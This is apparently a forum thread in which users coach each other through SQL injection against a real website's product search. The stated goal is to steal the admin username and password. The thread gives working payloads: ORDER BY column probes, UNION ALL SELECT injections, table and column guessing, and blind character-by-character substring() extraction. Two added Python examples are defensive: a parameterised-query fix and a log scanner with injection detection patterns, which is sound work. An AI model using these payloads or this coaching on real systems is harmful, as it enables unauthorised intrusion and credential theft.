sql blind + "union+all"
I have read numerous tuts on SQL injection and I haven't found an answer to: what happens when I know the number of columns ("ORDER BY" method) and I use UNION ALL SELECT 1,2,3,bla… and the page doesn't spit anything out… neither a number nor a string by using UNION SELECT ALL 'sddsd','sassa',…. (also checked the source)
Also, to add severity to the problem, the point of entry is through search, so there is no possibility of direct selection of uNames or passes + the site developers didn't name anything in English, so guessing a table name like "users" or whatever could be difficult.
And yeah, no server error output as well. So to guess the "users" table name && the number of columns… winning the lottery seems like a piece of cake considering this. :D
For argument's sake, let's say that brute force or any invasive method like UPDATE, INSERT or DROP is not an option. We just wanna get the admin uName & pass as cleanly as possible.
I have already tried both… Ok here's a bit more info on situation…
We are searching products and products are linked, when you click you get details…
**** something LIKE this ****
```html
<a href="/catalog/articles/" >
<div align="center" class="articles" ><img height="15" border="22" alt="" src="/pic/tmb/.jpg"></div>
<div class="article_Name"><b></b></div>
<div class="article_Description"></div>
</a>
```
**************************
Only difference with ALL and without ALL is this:
-1' UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14 from articles --
I get like 50+ empty boxes, each containing product name + pic + description, as shown earlier.
-1' UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14 from articles --
I get only ONE box, also empty.
Hm... I'm kinda puzzled by this, obviously ONE box means something but I can't figure out what.
(whole site is one big XSS hole, to add)
The only difference between UNION ALL SELECT and UNION SELECT is that UNION ALL SELECT will output repeated values. So if you had a table that looks like this:
ID  INFO
1   bluh
2   dsfdsf
3   bluh
And queried 'UNION ALL SELECT INFO FROM table', it would output bluh, dsfdsf, and bluh. 'UNION SELECT INFO FROM table' would output bluh and dsfdsf.
I'm assuming that the site is using $_GET so the url looks something like this http://www.site.com/page.php?id=1 right?
and you are injecting http://www.site.com/page.php?id=-1' UNION ALL SELECT 1,2,3,4…?
You should not have to put the ' there because that would cause an error. The query that the site is making most likely looks like this: SELECT * FROM products WHERE id=$id
Since you are adding a ' it would look like: SELECT * FROM products WHERE id=-1'
and that would cause an error.
Test this out: http://www.site.com/page.php?id=1 AND 1=1– this should load the page normally
http://www.site.com/page.php?id=1 AND 1=0– This should not load the page
If that worked, just do http://www.site.com/page.php?id=1 AND 1=0 UNION ALL SELECT 1,2,3,4– Make sure you put the right number of columns though…
new_hack8912 wrote:
I'm assuming that the site is using $_GET so the url looks something like this http://www.site.com/page.php?id=1 right?
Sorry mate, <form method="post" … but no difference…
new_hack8912 wrote: and you are injecting http://www.site.com/page.php?id=-1' UNION ALL SELECT 1,2,3,4…?
Hmmm, yes…
I figured out that query looks like this:
SELECT * FROM PRODUCTS WHERE product_title LIKE '%$post%' …
If I don't use ' to close his LIKE I get … oh well… you know…. "product not found"-shit. So my injection looks like this:
SELECT * FROM ARTICLES WHERE product_title LIKE '%dumbValue' UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14 – %' and i get expected output… all empty products placeholders…
Even when i tested ORDER BY i used ' ORDER BY 1++ – (and i need additional white space (%20) after "–" or i get "error")
So there is no doubt in my mind that ' is required…
new_hack8912 wrote: You should not have to put the ' there because that would cause an error. The query that the site is making most likely looks like this: SELECT * FROM products WHERE id=$id
Since your are adding a ' it would look like: SELECT * FROM products WHERE id=-1'
and that would cause an error.
I know exactly when I hit the error cause there is no "box" output at all. Page gets broken… ( no shit :D )
@system_meltdown Can you be more specific… what exactly am i getting by trying to "catch" substrings ?
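As an added example (not code from the thread or from anyone in it), the script below reproduces on constructed data the query shape the OP reconstructed above, `LIKE '%$post%'` with the search term concatenated straight into the SQL, and shows why the "50+ empty boxes" vs "ONE box" difference appears: `UNION ALL` returns one literal row (1,2,3,4) per row of the joined table, while `UNION` discards duplicates and collapses those identical rows to a single one. The schema is an assumption (a `products` table with 4 columns instead of the site's 14, so the payload uses 4 literals). The parameterised variant beside it is the fix: the driver binds the term as data, so the quote and the `UNION` keyword never reach the parser.

```python
import sqlite3

# Constructed sample catalogue: 50 rows, 4 columns (assumption; the thread's site has 14).
SAMPLE_ROWS = [
    (i, f"item {i}", f"description {i}", f"/pic/tmb/{i}.jpg") for i in range(1, 51)
]


def make_db():
    """Build an in-memory SQLite database holding the constructed catalogue."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE products (id INTEGER, product_title TEXT, description TEXT, pic TEXT)"
    )
    conn.executemany("INSERT INTO products VALUES (?, ?, ?, ?)", SAMPLE_ROWS)
    return conn


def vulnerable_search(conn, term):
    """The shape the OP describes: the search term is concatenated into LIKE '%...%'.

    A term containing a quote closes the pattern early, and anything after it
    (a UNION, a comment marker) becomes part of the statement.
    """
    sql = f"SELECT * FROM products WHERE product_title LIKE '%{term}%'"
    return conn.execute(sql).fetchall()


def safe_search(conn, term):
    """Same search with a bound parameter: the whole term stays a LIKE pattern."""
    return conn.execute(
        "SELECT * FROM products WHERE product_title LIKE ?", (f"%{term}%",)
    ).fetchall()


def compare_union_forms(conn):
    """Return row counts for the UNION ALL and UNION payloads from the thread,
    against both the concatenated and the parameterised query."""
    # dumbValue matches no title, so every row that comes back is a placeholder row.
    union_all = "dumbValue' UNION ALL SELECT 1,2,3,4 FROM products -- "
    union_only = "dumbValue' UNION SELECT 1,2,3,4 FROM products -- "
    return {
        # one (1,2,3,4) row per product row: the OP's "50+ empty boxes"
        "vulnerable_union_all": len(vulnerable_search(conn, union_all)),
        # duplicates removed by UNION: the OP's "only ONE box"
        "vulnerable_union": len(vulnerable_search(conn, union_only)),
        # bound parameter: the term is just an unmatched pattern, no rows at all
        "safe_union_all": len(safe_search(conn, union_all)),
        "safe_union": len(safe_search(conn, union_only)),
    }


if __name__ == "__main__":
    db = make_db()
    for name, count in compare_union_forms(db).items():
        print(f"{name}: {count} rows")
    print("legitimate search 'item 1':", len(safe_search(db, "item 1")), "rows")
```

The row counts are the whole story behind the puzzle in the thread: the page renders one product box per returned row, and the literal row `1,2,3,4` carries no text the template expects, so the boxes are empty. With the bound parameter the same input returns nothing, because `%dumbValue' UNION ... %` is compared as a pattern against the titles.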
What happens if you do %' AND 1=0 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14–
It sounds like it's blind so the above probably won't output anything. Also try the injection you were doing but select a table. First test to see if the output will change by selecting a table that you know exists Like 'UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14 FROM PRODUCTS–'
Then try just some random table 'UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14 FROM asdfasdfasd–'
If the site spits out different things from when you enter a real table or a table you know does not exist you can then guess table names.
So if you were to get the same response from UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14 FROM PRODUCTS– and UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14 FROM users– You would know that the table 'users' exists.
If UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14 FROM PRODUCTS– gave a different response from UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14 FROM bluh– You would know that table 'bluh' does not exist
You would then do the same thing for columns: UNION ALL SELECT GUESSSOMECOLUMN,2,3,4,5,6,7,8,9,10,11,12,13,14 FROM PRODUCTS–
When you have figured out which column you want to extract data from you would use substring() to get the data –i think this is what system was saying–.
AND (UNION ALL SELECT substring(somecolumn,1,1),2,3,4,5,6,7,8,9,10,11,12,13,14 FROM sometable)='a'– If the page does not return an error, then you know that the first letter of the data in 'somecolumn' is 'a'.
If the page does return an error, you would guess another letter until we figured out which letter the data in 'somecolumn' starts with. AND (UNION ALL SELECT substring(somecolumn,1,1),2,3,4,5,6,7,8,9,10,11,12,13,14 FROM sometable)='b'–
To get the next letter, you would enter AND (UNION ALL SELECT substring(somecolumn,2,1),2,3,4,5,6,7,8,9,10,11,12,13,14 FROM sometable)='someletter'–
And just keep going until you get all the data.
If magic_quotes are on use the char() function to encode the letter. For example, char(97) is 'a'. You can use this table for conversions: http://www.asciitable.com/
It's kind of hard to say without actually seeing the site but good luck. ha sorry for the long post
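The procedure described in the post above (an ORDER BY probe to count columns, UNION ALL with a literal row, an AND 1=0 true/false test, then one substring() comparison per character) leaves a distinctive trail in request logs: each step is a separate request, and the blind phase needs one request per guessed character. As an added example, written here for the defending side and not taken from the thread, the Python script below parses constructed access-log lines, URL-decodes the search parameter and flags the patterns from this thread, then groups hits per source address so that a burst of probes from one client stands out. The log format and the `q=` parameter name are assumptions; a POST search form like the OP's does not put its body in the access log, so the assumption is that the application logs the decoded search term in the same shape.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus

# Constructed sample log (Apache-style). The last line is a benign search that
# happens to contain the word "union", to check that plain words are not flagged.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Oct/2009:18:01:02 +0100] "GET /catalog/search?q=lamp HTTP/1.1" 200 5123
203.0.113.9 - - [10/Oct/2009:18:01:05 +0100] "GET /catalog/search?q=-1%27+ORDER+BY+14--+ HTTP/1.1" 200 812
203.0.113.9 - - [10/Oct/2009:18:01:09 +0100] "GET /catalog/search?q=-1%27+UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14+FROM+PRODUCTS--+ HTTP/1.1" 200 40211
203.0.113.9 - - [10/Oct/2009:18:01:15 +0100] "GET /catalog/search?q=%25%27+AND+1%3D0+UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14--+ HTTP/1.1" 200 812
203.0.113.9 - - [10/Oct/2009:18:01:20 +0100] "GET /catalog/search?q=%25%27+AND+substring(guessMe,1,1)%3D%27a%27--+ HTTP/1.1" 200 812
203.0.113.7 - - [10/Oct/2009:18:02:00 +0100] "GET /catalog/search?q=union+jack+flag HTTP/1.1" 200 4870
"""

# Assumed log layout: ip ident user [timestamp] "METHOD path PROTO" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\d+)'
)

# Each signature corresponds to one step of the technique discussed in the thread.
SIGNATURES = {
    "union_select": re.compile(r"\bunion\s+(all\s+)?select\b", re.I),
    "order_by_probe": re.compile(r"\border\s+by\s+\d+", re.I),
    "boolean_probe": re.compile(r"\band\s+\d+\s*=\s*\d+", re.I),
    "substring_probe": re.compile(r"\bsubstr(ing)?\s*\(", re.I),
    "comment_terminator": re.compile(r"(--|/\*)\s*$"),
    "quote_break": re.compile(r"'\s*(union|and|or|order)\b", re.I),
}


def parse_line(line):
    """Split one log line into fields and URL-decode the request path."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    # unquote_plus turns %27 into ' and + into a space, which is what the server saw
    rec["decoded"] = unquote_plus(rec["path"])
    return rec


def classify(decoded_path):
    """Return the names of all signatures that match the decoded request."""
    return [name for name, rx in SIGNATURES.items() if rx.search(decoded_path)]


def scan_access_log(text, threshold=3):
    """Return (findings, suspects): every flagged request, and the source
    addresses with at least `threshold` flagged requests. Blind extraction
    costs one request per guessed character, so repetition is the strongest signal."""
    findings = []
    per_ip = Counter()
    for line in text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        hits = classify(rec["decoded"])
        if hits:
            per_ip[rec["ip"]] += 1
            findings.append(
                {"ip": rec["ip"], "ts": rec["ts"], "hits": hits, "decoded": rec["decoded"]}
            )
    suspects = [ip for ip, n in per_ip.items() if n >= threshold]
    return findings, suspects


if __name__ == "__main__":
    found, bad_ips = scan_access_log(SAMPLE_LOG)
    for f in found:
        print(f["ip"], f["ts"], ",".join(f["hits"]), "->", f["decoded"])
    print("repeat offenders:", bad_ips)
```

Two details worth keeping when adapting this: decode before matching, since `%27` and `%3D` hide the quote and the equals sign from a naive grep, and treat the response size as a second signal, because in the thread the UNION ALL request returned 50+ boxes and the single-box responses were much smaller, which a size-per-request comparison would show even where the status code stays 200.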
new_hack8912 wrote: What happens if you do %' AND 1=0 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14–
One empty box.
new_hack8912 wrote: It sounds like its blind so the above probably won't output anything. Also try the injection you were doing but select a table. First test to see if the output will change by selecting a table that you know exists Like 'UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14 FROM PRODUCTS–' Then try just some random table 'UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14 FROM asdfasdfasd–' If the site spits out different things from when you enter a real table or a table you know does not exist you can then guess table names.
-1' UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14 FROM PRODUCTS –
50+ empty boxes. PRODUCTS exists. (tried a different name like PXPRODUCTS and it breaks)
new_hack8912 wrote: UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14 FROM users– You would know that the table 'users' exists.
Table naming convention is not in English. So no point in guessing USERS or similar.
new_hack8912 wrote: You would then do the same thing for columns: UNION ALL SELECT GUESSSOMECOLUMN,2,3,4,5,6,7,8,9,10,11,12,13,14 FROM PRODUCTS–
I think column guessing is an option cause columns are probably his product details like description, name etc.. Will play with these.
new_hack8912 wrote: When you have figured out which column you want to extract data from you would use substring() to get the data –i think this is what system was saying–.
AND (UNION ALL SELECT substring(somecolumn,1,1),2,3,4,5,6,7,8,9,10,11,12,13,14 FROM sometable)='a'– If the page does not return an error, then you know that the first letter of the data in 'somecolumn' is 'a'.
If the page does return an error, you would guess another letter until we figured out which letter the data in 'somecolumn' starts with. AND (UNION ALL SELECT substring(somecolumn,1,1),2,3,4,5,6,7,8,9,10,11,12,13,14 FROM sometable)='b'–
To get the next letter, you would enter AND (UNION ALL SELECT substring(somecolumn,2,1),2,3,4,5,6,7,8,9,10,11,12,13,14 FROM sometable)='someletter'–
And just keep going until you get all the data.
Seems like quite a bit of work, I will test it on localhost first… :)
new_hack8912 wrote: If magic_quotes are on use the char() function to encode the letter. For example, char(97) is 'a'. You can use this table for conversions: http://www.asciitable.com/
magic_quotes_gpc = OFF :)
new_hack8912 wrote: It's kind of hard to say without actually seeing the site but good luck. ha sorry for the long post
Yes I am aware that this is more difficult cause somebody is "translating" your data, some "translated" data can be false or just misinterpreted, and it all depends on the person's knowledge. I'll try everything you said… will post results in the evening GMT+1.
AND (UNION ALL SELECT substring(somecolumn,1,1),2,3,4,5,6,7,8,9,10,11,12,13,14 FROM sometable)='a'–
I get a syntax error on my localhost even if I "guess" the right letter…
But I tried
UNION ALL SELECT substring(guessMe,1,1),2,3,4,5,6,7,8,9,10,11,12,13,14 FROM PRODUCTS –
and actually guessed 2 column names. One is "id" :D … and that was hard one! eh h eh e
I will PM you on your request, if you want to see the page for yourself…
But theoretically speaking…
after UNION ALL SELECT 1,2,3… does not provide any number, i/we continue by guessing column names substring(guessMe,1,1) and its values …
hmmm…but to what point? if i see no output when using UNION ALL…
Reminder: no invasive methods like INSERT, UPDATE etc. allowed…